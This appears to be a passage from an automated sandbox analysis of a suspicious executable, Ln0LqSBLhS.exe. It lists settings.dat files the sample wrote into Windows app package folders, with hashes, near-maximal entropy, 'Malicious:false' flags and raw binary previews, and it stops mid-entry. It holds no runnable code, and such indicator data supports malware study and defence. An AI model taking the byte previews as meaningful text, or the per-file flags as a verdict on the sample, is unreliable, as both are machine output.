                                                                                                                                                                                                    Preview: ..BD.....|.e&.y.J..W.....s/.QSV..{.R...7.....W...yC..,v.z..j.t..O.9...[..a.g.!..<.IY.....e...k[!<D.....n..L5[..gP....`.L&@..W...(........t....g|........R.u..G...W.........H...<..\2a...4...S....V.&..U.. [..H.e*.....=D.Ry..H...,..9.....A1h|.>2..g@.z\M$..p.F.W...]...Q.A..c...+.9..R.*.............y&...N.......v..}]....}.l.....;..p.....?.Q.......(AT0......W...%...S&...y9Y.\..34._...4...,.f3..._.E..;.,).d..."..)T1,.t~h.......!M;..d\F3...e.~)...;..[.........Q....(".!.i..'N.)..(/R.U-H.......:dK.r(...-.F.x.d.....&.;. R.J.<..0.I....X....E.2..I>2..Bi.0.,....5t......'.V(..o..LS#.2r.Z....5......!.\.......P+.._..1..x.."R..9.J...&~../()...-#b.~..<...U.7._.m.qq...d.8Z..I.....]....A.T....hQ....d1..8._.6.QWVL..7lZ02..\..O>..c ..?4.3Q..OX...w...<X.T.zC.j...,.vz..!.......z.z.=.A.X.8.-d....x....jV...J..[SVZ. ..a..].81q......BW.....Dk..i.....9....j...F......]..K...w4...m}........yN]l.@...T?..v'p4..UWQ......5..N.[A...rr..T..+k.g..5...._.gaF.}..7wf."bP....-.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCamera_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.975893885280028
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:B4XFqt+8uwMudRzU7Vu21xZXn2Hd5X70+9VOaUrBK:iFqtqwMl7Vf3RnYN70+j0E
                                                                                                                                                                                                    MD5:C3791276A4221D353922785150798ED3
                                                                                                                                                                                                    SHA1:AEBE0D27F781CDD593907F164B81A29C9740F599
                                                                                                                                                                                                    SHA-256:E3D99631D0D77F29A3C4EB93D5D373C10695DEE00CB2D6BAC030DD5A7E9054BD
                                                                                                                                                                                                    SHA-512:8E2C7741BC1F68C1655A3C43B3E2E20F0E002C5E2821481E6965D1281C288296498D24DF1B0EB9A96017336AADEC265CA6C47D23F4A257F057C4D1536F36E132
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .?.w jw...f...X........t.LXCf*m.}.....r..I..q.s...4..2..p.....F..7.....Q..L.!.x[P..G..Tu)....... .|...%4z|8..8...0..Cs..*.M.Q.9Yj.gZ.V..TB.........@.`=.pN...e.f.x..u..U..bx...._..S.&....?n.b.e.7.c3AD..w]?J....DA....\U.{..Yv.]..L...E.^$02G.B...ChA..Q]i.P..*.6......B.%*.9.H.jeC8.].~....Og}....z.)._.Z.[!..K..x..|.d....Wn........y.....,....L.>..|Bh.P.I...%.........J<.I.....:.7[...N.~R.......CS>.....9dT.?..[..O..m....|.>.z...(.s...s..?n..T..y'X[T=.....n...$.........j.|.E..MY...0R]2....p.s,<&..CR..o..S&..x.k.e.H:o z.-.\.k.C.v^..l..w.~.B.....f.....0..}.z..h|....n.Ts.......T.jk.~.v.31.-._H\s..X.....^.?..............W..MBs...m\g=.j..>...#.G.$.....x7....H.].....lG.XV..|ah:....`.....@...1..6K!.........z.v.K[.6..z...8u...2....w.@...v6.A.;...7......Z...ua.W.~.&..d.G...H.:#.s.....u.=...C.....,.y..p...!.6o.h..X....w.LN..ND..|..N'.m..i5J.m.....3..K.k.eg....l.. {]..o...iJ.EE..C./..V......(...#...W-...U..JxN....P.........N.&%.....*..u.m..tg.FoS,..S
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsFeedbackHub_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.97836714964917
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dXxgaEnXEQoDXeKZxOPGTkxQvJYGlYlwg/Lzv7CG7qw4a:dXxghNoDTZiG4xsLlepfOg4a
                                                                                                                                                                                                    MD5:C86F16CDD32225029F568D5F1CE901A5
                                                                                                                                                                                                    SHA1:D89B26BFD9BBE323B4C2A0D2FA0F9841AE392573
                                                                                                                                                                                                    SHA-256:B974E37AAAF0C23FE6E2F051A5A0139C15C2A4EC2F938698D86454E8B5F42429
                                                                                                                                                                                                    SHA-512:AFA2A7B1A29AB8FDAC9A716E1D741D89ED3D0DD6620FFBCB865EBD8C35DAD626D9757C67C2A86792121910432A6643865F30E60275367D75AB7FE4412D743745
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......I.&.....'..."U...Fi..,..RJ.U-.wj...e.@?...3..k....0m.~B.;./.W.........A.h.O......m....V8_@......{...d.......+...h\d.7. ....1.Xg}v.e.. ..Q.<...8=...Ir.^/...%.....B..T..iE~...d...23...%a.y..Y4(.j..S.....F..S.^..;.+m...+.\%....G)R.M..Wn...{T..l%U....1.y..,...z7._....D..v!....l.R..:.....b.,Z.].........|9S...o.V.I1._.4...(..)....EEFM;.#).....H..U.L..j....Q...Wa3....};bO6..l.i..[.J.9..u.(.&y5.i.8.g...I1.OH.":..2.x.A.3.kQ:Z7.q..."..s..)..I...fF..C0..,.Ru..9...%.:...e..J.M.(........+.K....R*..^Iy-.v ...@...b..../0.*...k.).).i#...O...Zgr.OY.S.g.Y.$....).A...v..Y.c......@7._....)./.(Yt....Jq.........I..@.0Rp.\....79.5...mQ.P.w.......C..H...i.QH......L.y@......c......#...Y:1K....W....I..~.....V"..|:..7.R...L$Y..mV...-..'.o.aZAX..mC....Di{..m.C.S.... ....e..9Xd...Q&5...!.V:8_(I..._e.T...\....j...^Fdy.b6$.......|....j..^~t.H.&..o_..mGV...9.6..d:8...TL.l3~..R...B...s.Q.Zvm;0.y/.>....M....c.....#..v......D..;.F...3AA.zq...&.CQ....(.~..r..p.5.z.{J%}>.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsMaps_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978145742798899
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:wn6/tVzGJWCHzPANrN26Jj4vf4hfDJebaTwOgWTzlPl3:wn6lVGJWCTn65aYfgOTJ
                                                                                                                                                                                                    MD5:726C20F8F3E2D55507B0613BC48309D5
                                                                                                                                                                                                    SHA1:8A73FB6F060B149B0FA5C2B089483F979D806E3C
                                                                                                                                                                                                    SHA-256:D88E74BE661260AC968CFE42E5672A2BA3637F586045138B2B5686DFB864CB31
                                                                                                                                                                                                    SHA-512:731361B2EE27CC569E556F8612FF7CFC396DE773E756EEEBC5532783FBC3E2B9322E0AF01C68F01F09258FB2122C575DBA465AEAA5B9463E0B3FA94DEABF3798
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M..6....{).."C":.wn.............)VX..Z.q!....1)#i...........IW....]....F....U.F...a......s......D.D....mep=.85....KF./.4_.b..n._.....G.!..:......$....}.$.=.F.b...#.Q..._..._..x.{.Tx..<.. ..u.M(.r.S..........i.b 6{]k*7.?tj..V.L...x..+g.,7J!.Us!.6.Cm&/.f...I._...f.=..$.}..W.:.c/e.q..[..c.&P..8W../Q.....U!).a.!n.$.,.TS..O.x5;.=.{U....#u...[...9..D.<.b{...s.....z.......4-..;5;..;PRK.6plCat...*.Cj......[.G...&...'....JP..y..<.]B.&.Y...O.W"..ASD...;.K.w......K..O.dd9`...OOh..&.8=@.1wWo.....i..z.e...Gi.....J..+5.*(!.].4.&#..W"...+.Qy.O..a....!.2`.y...[H.K..k...[.O..7...A.........ZZ..3h{..5.#....:S.}#.^...L.W;.s..b).0&...#,.'..T.R'.3<hu..|S....b;..p.{...P.`R..9k..I.1.......r...F.....R.s....N....xrs.h.L.A..O......B^.(VH.....0.....\..........e\.b}....]G..)...P.x.LH.......1wW0........U.[K...W_.}.i.Z_._........ ..a...e....uv.#....).*f...&......Nu..?......V..,l.z4.0d..~@.....*w..K...;.p}.P..l....P....}o...M.(..y.....!..'_\...$.;.....dm....%78.^!..EVLX.^.v...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978963976617365
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:j8/xhxJ3cOqNPauV21p1LuGq6QNJrwIb71A0Ab0B:j8J13/2P5k1rIHb7nAb0B
                                                                                                                                                                                                    MD5:999AA32EE276FD1B911FF866319A284B
                                                                                                                                                                                                    SHA1:BCE09DA9C6F21015AD02E84B3C3E1271678100F9
                                                                                                                                                                                                    SHA-256:585274580259E3B0B49811CF738AE3B0155F441C43C2230ECE9650074E650D85
                                                                                                                                                                                                    SHA-512:2359E8D2AAA94D8CB7B8531A696338FC7396C7B86C97456E29D032F90DBBF11D243E8C0F7640E415471C7AA6C7144BD2BEE865A4A265EE5F728C6330182B868F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .bOf....&].J*%2.f:.[r.J.o........?.........r..U.....i..nE.g.M.gf2...3..`.Q'v.0....t.3{K......K.....).!.y...QUc.5>.D4.....P....~.$.Z2.gT.-.+>Ia.r...)!..>.f...1.K.Q......C.7....... e.6.;u.S......@._.9.9...9Vt{...).x.@6..PZ{.']|f..g.%....wh..^..9...v...|]....y....2... .p.....x0y^..(.z...-..o_...s......\g....`......9...E...!1..E4......H.x...~.A.t....R..Q(.S"h<........a.o.x;..4...zy..x..p!..E.,.S...-4.^.;...{+-..v...:.=....,.g.4GpmW0.%.AM.L...nP..]w~.{%.O...RA..C.s..9I[..^.f..^|....pZ.B;.M$.wYR....ar..#..FWoxV...}...(V<....9.H.u?.\.Z1...W*.V.+.....06...g...o.V.J._.v..~.TR.:.j..t..P.p.F\..>f.w=.w*2:......1.A..M.w.+...E.k..wT*[.......!..k..+U`I.D4..=..-.YBK.w.`..i|4.........>.N.a.8.5..4cPw3.tD.....h...y.>J&.9....."..\..LC0>c..^.L.P[%...*.Os.Z...".B.=5....N,g....Y..0.........#.).(.R|.<..0d..... .=O.......z..\.#0..o.5..EN.sm..|AP.%a...'C.uC.....o..v.6..osl.\...ph4..~.s...R>U,...\.C..C.)-..%.-+6......u..2.5.Rax..6..)....yz....C..[.-...D.+...^o.a..F.....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Xbox.TCUI_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976452667726323
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:zOE8GkItcKrULuaTENiHY0Iu/I0s3BI0SRuwwU9ZiaEfjcrgXzB6twI5a:zjk4Vr1/iHY0Nzs3WNRuufOjcrgQwI5a
                                                                                                                                                                                                    MD5:4CD0E0150FDBF46F0A4F72693234D719
                                                                                                                                                                                                    SHA1:3E16D1AB945B2E3591A6505202639E679C6CFA44
                                                                                                                                                                                                    SHA-256:4C691D02FAA7FA2F0F37EFBE0FDDB5C0FB2116676D7430A57539021DA3C9C22C
                                                                                                                                                                                                    SHA-512:7006D8363DF320C35AAB6AE7D909EC6F3E04156CB65BAA9A972A723EE849A2D44044BFB3E81FDBAE163349131C34A56ADC2B4B7BAA7A0075A8D2C46F1ECD5A7D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .G-m...3.x....wSk..g...%.....IT....I..9.B......>..\!...E..N..#..:.*.S..K'9...J.....z.@}.H|._O.......:..4....P.......v.\1e.zl;...~..G.*.a...y_E./Z.0.cA=...:.Y0B..(...@,..%=.V.....F.eSG\.m...g>.X.&".d.T8?N?'.x..s^.K..... ....F7......w.3..0......Q.w.n~..I.~..L+...y..B.B+..wG...'<..."....4..J...7.....^.lO....X.<.d..QT...5.*V.a'&..-W.dZ. k<...k..[.~...]v...s04...z..r$...T.Dq.d);...rL.{G;./!..K....!.U.r(.."U......-..1.f...0.....1N%.).#..y..:.a!.h...`.....f.g..*.s..N,d...<.$.....\@.O...q`6...|.+.W.U#...`:..=....8B8......=..+.+.....0u.:...'[....W..J....r...e|.1..1O;.*\!....n.O=..|m.sLv..._...d....$Vw..,d>.B.Aj...{...P....r.."....\...H....g......,'.c...%}!..S...R....N<......D.$$U.....`.7u..m..7.{.up|.+5G......U.i.V.tc....mz..H.Z..P........@.c.`Eu......_]i....c.,...{+.iY/t.Rn+........~&....vK(}.F3.{qX.v...Y....h..}."K.,.3..a..Vu......g...T.......4F.2g.e.S..Lm..=|...|...Y..H..U.`P(.Iy)..#R.G}....E.M..y....7.XS..OJ#..+.).).#......x.l.qz..t.!.3
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.976904936760552
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:/JVg6LHbNtb9fyldsZEs2Ojj716w0TQ5imCvvekgWxRWKUu:/7Lzb9fIs2M7igY3LWKUu
                                                                                                                                                                                                    MD5:CA122FDD26485E9F0FF74A0FEC033E79
                                                                                                                                                                                                    SHA1:098AF527B7C13FC9ED79504BEE320EE3CC34A78C
                                                                                                                                                                                                    SHA-256:77CF971EC06A7E794F0EE77AD30E95A4FEFC04C8E60E2E9189D51CAB30513DC1
                                                                                                                                                                                                    SHA-512:4D82854754FCBDDB8DE5DBC8E3FC0F1D6A795A789843E7F86C2C6AC8219CB0F2672FCB0653445FE9DCD7E231D773C48B73E09A6455B20B067340E6E400E286D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .(...@....H....B..6..s.d...8]......jX,@7W!k#..N....U+G......9.p./V^c=..d......#a..v...;..L..}...i.a$"..S....P.:....[J..&..E/.7...~......../M$.z.e..2..0-%.C..+...G...=,C......././.!....B9e..Jac.".>Y......n.......0....k.l.pe[3....... ...$F>.{.yK`[........]y....X..K.h..3j.Z.b...dl.3........w..j.5.3.H.t0.h4m.xU.*].jU!.=-Mi.........N..(.h.=!<.5...F...P..7d......^X..4Y./...Y.qc....(.S..EYaRE&x&.l..v..|"<...=...b.....w..-8kA.U.A..Mw...}..nTv.'..'..M..f..O.^.'.Y.).....e.e..........-.VNg...OO.....[....z:..(2]?....l.......g....J.,3.T.B*...7j}.}v.t7k....B......C....`.;NmU....fO. .....}..=.)....-...,~. 2W.T.}v.....mw.W6.U...+qs.@5l.......)1..ty...L..=~v.4.P ..\...J.2{..y.!.........A.'.na.....X3........(. z./...M...ZI......v\.c.f.R..y-&..;......_...K572.m(....cw...I.H.jZR.w....D.Z..A....2..T.>#...W.#,.........:....M.$/.%..W."..._i......n...7..&.2.r&M.&.0...AA,.9.}..7..Y.~[.AG.9}<G..0.?...`..J....)?.T,.0..A.&.g}.!.......e......zl{.$.{.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxApp_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.978320030834734
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dJWpTJsyqYm/RzzKQ1M8HoGpHeZeOW0g/raQEW+d5:2fsyLKzl1M8HoWbOWZ/e3/
                                                                                                                                                                                                    MD5:6A898174171B6360ED8F7A9B82FFD852
                                                                                                                                                                                                    SHA1:894944FB927CC9306C24334B9C9F235D0BA03DC9
                                                                                                                                                                                                    SHA-256:700A9F3B1DC45550571476C8D1C2AD81B8A4BFB209EAE703470C2C558E0C580B
                                                                                                                                                                                                    SHA-512:869593AE2A11F238A156F5709F0DCC95391B12E417DC58005783C790D1CF576885A89D30D41FDE33D62D97287AEAE2598EF53D064FC18D3A8F9C109F678A13F1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .o...>..UN...h....eQ.K.b....#>#9Gy.*.....o.X.lJ.V......T....e_}|.....Mc.j(#.u.....d[M7-Ld.S.c...?w.._..c.]....A.(.\.Q.D...|..xA.vV.t.0......b8.kN*T.h1......L..J."VT..*be...|n?..........[..dn.x.I. ./.,.n.....)M.o{[..R>....r..L...x.......z*kqN......6L.yO.z)T.....nIHBt..[`...r..'.m......Xn...r...BF....Z....-.....L.L..O......5..&...h.=&.M..s....E<\...c../+t+...@&...A......T..z.|..-.e.....x..H3..0f6-..p...[.48sT.[......{....V.!N.....k.i"..].l..Z.az2.....9.P.!"D..~E....Vf..v.].......]os..R.P..;.=.bf2..kV&....%......1..eGE.}..Pj.....&3.P.H...>......Z..X.(..H...t....\I..%.x@..Y?4.32*_..G.~P@....Ud,Y..D..q.^O.(.?.u;......._<8.......:.py.(.8w.q..8c... .....)...a...B...CS../.S..t....uJ......5.n...p..=.NX]..~.-..D.......p.>`.K.Sq..L....\..K.;...E..K..O.Q..K..0|..H....8...w.7.TP.T..dzo.+..ZJ..N>J.(.......}oJ....5.#?....u..K..yz........o)...}...<...4j..!"..X.....b.p..../.wd._..2.4.:.S\..*..H'....0j(B..+W...0.T...Pp...g..._Fs'.iY_.jK..7d<...F......W.p.%.....e
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977102610771324
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:0MgEgLd87fFsf1d+mNzLRY9kew1HZp644HZfxkj3a/n:0h87if1gmNzLRY9kHa445Jkj3an
                                                                                                                                                                                                    MD5:F49BF70AFCE3AE4897FE3F90849859D8
                                                                                                                                                                                                    SHA1:D503ECE0841DEC97D17028CD4145155D70CA3B97
                                                                                                                                                                                                    SHA-256:4239A85A203329026BC7D3030AA7037A0C68BE94C4EA5B4518B5697D357955DC
                                                                                                                                                                                                    SHA-512:0A1CFE0715CD88244A81BAECB42638818798A0B1670E9FADD93605E3171795CE66DD6F81ADD271AD4A85744A062CAAC4E042681EEAA3704B22CCC5CD512AC417
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....{.b.1.c..4...YA'.W..+.....'.].)`...&...f..E........?..N.hy.:...`}~.w~\..IL`.....ad...|a...T..x...R.......v...%b|w....t|M*.qAMW.s..rA..........-.7E..!...VJ.. .....).=.o....(8]D$.(...3.^)....2b......h"....jp8...4...E......BNd....[3q.{.7F..d.-...>=..N.'5.a..h............%nIW-\...]..Dx...;..fv.9.pn..])5z.@^Y(\...a'A]...5S'.7.xg....=/......H^Q}.'..p..%....5\...=!..m&....."..U...14....:r..Yh~..y.".../..R.]!.{.>d..!v5(.tW..c...J...L........[d......tp..E....~.G...!.K.JS."hS<.v..t...?(...P..k=..+.....^x...'..e.)...\.L..Sm.\8.(.+:.px,...`......Y..oPq.F..-...#.m.B\....9]Ym.e..-.Z...z.m....=E....L.c1...e...~.Z....p.<S..@...-..#..k...p.g~....#....k%..C...H...}.r.h.;..X5....H$....x.56:d.......tH/?...VF....A.1W...V.K...C....N[@.p...A.oP-a..\6.|..Z0....F..c.....#..:tu.B.8..5.3I%.!.^.G....Sln..8A.!~...rYF.l1.J.....-=J....C..<..!D...m.R....M..3...R..M.l..E.%...uTF....V%..1Y...=.... ....D.n0."....Tb..<`(.=...'o..s.#Sop.f.=C.F!v<._......V....A..I.H.k8...."Y
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9798600511842075
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:dsnNpXjYJZ9IQqYjVi1EJRKiqjjerG2TIPRtuLgdyLg/ohfy0eF:gN9YJZ9IQjjVi1EJ1qPeJIPbjAIAVeF
                                                                                                                                                                                                    MD5:618B16F2D204C320F1C1C6D81EFD89FF
                                                                                                                                                                                                    SHA1:1C025B22ED69A514B1C5744B26C0C3284D791580
                                                                                                                                                                                                    SHA-256:176538178877A11583FF55E3D8EB88B2DCB875E3C94A433657978B87252B66E8
                                                                                                                                                                                                    SHA-512:2F4DC2FC6CEB922C8BAA5311C13210F896C1BBD87F371465C2771ACD74849B79FBEB0B36B3026B1966C8179AA1DAE6E203863F96FB5C993A4176B08D9CA0347A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...,Y.~\...f.1(.r.>..~.b.P.r....YP....%....;.L$.G.}Z..?yo9.n...6..br..p.u......so.f..u..._"....*.+....N....n+..'...."._>..B.|3Mu...l..........H.#0"....u'..5.e.]z.A.C.jtH...n.....#9...J.I..`9p...$.C...3.SFM\.w.....I..<.9..q..\d.(...j.e.ET..J....&....{..)||~....;\.:..[......d..!.....'....C...U.X.....c.7Z..Acd..:.U.l...{.Z.y.2...+..G......t.a.........K..|.H..=...?P...\_.s..Y.)Sb.`....9[`So..&.C....h...x.p...b.6.......lA.|..iL........r..."<.:+`.e,E.b....i.H...[...=z.m...<..%UTs.!.......z$~(|.=D&..;..q..k....H.p6>z..6>....E)N. ...e.:?@....$.....9V..df~....$.[..`...3...3..sq.L'y...{..TG.R...}8..$S.C.B..j6.0...J\......(..P...MV<Q....#...9.j.?..bd....(../uM.Qs..,.U.K}.2...=..u.l..&.6.l.V<......E...Cu.....mh....E.....HF.....\).D......=.._....y.Q.F..2.+.._D3....Z<*eF_P..].uc*...}..E...Y1G(.i.w....<..........w=Z.Yo...c5.....^H"..v.;......>X..{.l..{0......<!,........Dm...6.|OJ#.......M}...m.w.h3k...6....#.W..........|.x...b[}=..p...DJ...".*..9t.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.977500917793708
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:RmUu4XBTMX3rpeC5zgOKTOC4umND5rTkccys2k4ZEkmDUOamSvbEzrQCR:RmM6X1UF6QmjnkMVk4ZEkmR/MO
                                                                                                                                                                                                    MD5:414DEB4FC99C81AED9DE5E3E595DFDD2
                                                                                                                                                                                                    SHA1:4315EC1688F1C3160E7051E838FD252A5991C27C
                                                                                                                                                                                                    SHA-256:C9D279C53138CA04FC5474EB6F6FD65B71CECDA5DA60945F476615D98ACB163F
                                                                                                                                                                                                    SHA-512:5021B579570314F1CC5A6EF33D5FBDEAA60230EBDD4EFA4EC8867B95938C3F37DCA2B401106168F8BAAEAE45E78315933E2ACA44CC5C0CBA7356860DAC79257D
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....0!J.C.i...R .5.FO/...;....p.VJ0SS`B..R....`..`j...[(.9W.S....}........%.S..w....G/E..Z{.=...7x...3....+......N{lPz..O4,...e$...?LID:...e..u.....bO)..R'*..`..w.!.j......[9.|Vx..Ysy.w.o.....|.]DN.M....v..e..\Z../...CZ.,....*..M....F,fzR.....:i...7..`.V..?.....j./....Te.........i...*wj..D...v/S..._....X..K...V.x.U.....2."...-.....OF2...lh..#.S.T...`.s.N..|k.S.....v'...%..,..r..'..H.&..%>.fE$.....nq.4.H.........;.>3.q..Yk2.av.P...Kb......e._@.b....Q{..sE.F..........5....T..70T..0.H...|n......j..Gh./.......=.?...e.....4Wwh..yv.......zN.\'K..#V...:._tqp......4%.....E.I...*..8..;..:....B...m...-a..lU.!.t...t.....s...4X.I.......e..e..W..X.L.%GZP|..*..D... .m..?P.i..6....^.........7n...I..w.a:.....-. ..!....M.s.:z,Z4.[..;.+s..L..N...Qo}o....ey. 9..':..p.8..+.?..a.6..B...vf....%.....S]...&....3O..{=..gt5.p..f..5.....+cD......\..._.....J....p..t...|Yo.cL.e...9+vG...D...&.H|...m...0.B..x....@...a..X.L!.."{$.L}....'.&.....@e.h.....B...ZV.xe.6.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.9768655086084985
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:UI1S4vQEFKcgqaskaVwdGQ5rzeqYxB3PTt0bxMBWmhmsRgagA7Rr/f:UooEFBgqasxVwdtraZ3Pp0baBlAsRx1z
                                                                                                                                                                                                    MD5:3C5F3982B3FAEB3FC3B2267C2F036386
                                                                                                                                                                                                    SHA1:60FBE25183B5562F8997CA886181779350331B85
                                                                                                                                                                                                    SHA-256:C906117CA84574211847288C8B20139420B1F3EA7A589CA0DC9EA4DADA487AAF
                                                                                                                                                                                                    SHA-512:6276C3FE9FC0F9BB4F44C56ABA129A0E4F727D79791A991090B20EDEEA0BAA7B88EC9A056DCA94051EE075731B9BABA342B45001725C6F93FE624F809839D050
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: m.}S......O.>!....(a!.g5...~2..A.9.1...v.0..o;.O........J..+.r....V.)..M.)..b-.....0G..k. P..]...wWZ..$.1.<..r...i...7.U#M.-.~e..(..E^..../c<..+.g..S...o.A(@..3B...KwZ.@..D..........:.S..r.>.-...j..F#].y%.kj.B.:o..T....W.L....A1]g.B/.X ._....c...X?.+..k0n.+.. ^.~..&..H\.Nw.WWuVHh..D.(.2....I@..............@....Yc.v.....W#KC9.[.i.X?...wxz..@......Y.....p..Q.g0o#Vw..1....A;Jv.z.......-....$....8..x..`.~;{Z.>d.be.{...>.w....G.z.)....+8...>.u..l.9b...X3.A.q.1;...d....X......cW....e..s)...tK....i.gk.iF..R_.._.Y...8.....g..]5..7..G..M...q_S.s<..&...M..K.c...y.e.R.,.<%...-.m71q..*(.h..:U....f..9..P.aD6$LT1.[.Tg...9...{...........u.A>.C..5L.6.5.#~ @..[.._.lF.N....g.~......,..L*...p..U.{XT.(..VI.....C;t....-b../5w<..c..`.2.B.Q..F.......u.S.PpL.E.w..Z6..e...)@..)...+....|.h...<y^u. &....X(._..K.-...}..-........V.]..Y...'.W.l..+.B..%.2..v..............X..O....O...!r.xU4e....X!..0W.....!D.2....3.*~...@Y....._B.0..l...>7.b.hA.......;.F._..SL.j..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.XboxIdentityProvider_8wekyb3d8bbwe\Settings\settings.dat.LOG1
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8521
                                                                                                                                                                                                    Entropy (8bit):7.973490875208565
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:07Oep2md8Cx/wpR1ELGXc9SRdUHU9INIspB2a6eY3Tk:0qcpER1ELcW09INIsH233Y
                                                                                                                                                                                                    MD5:5142A9629E3D27ECE571A37649E6D52C
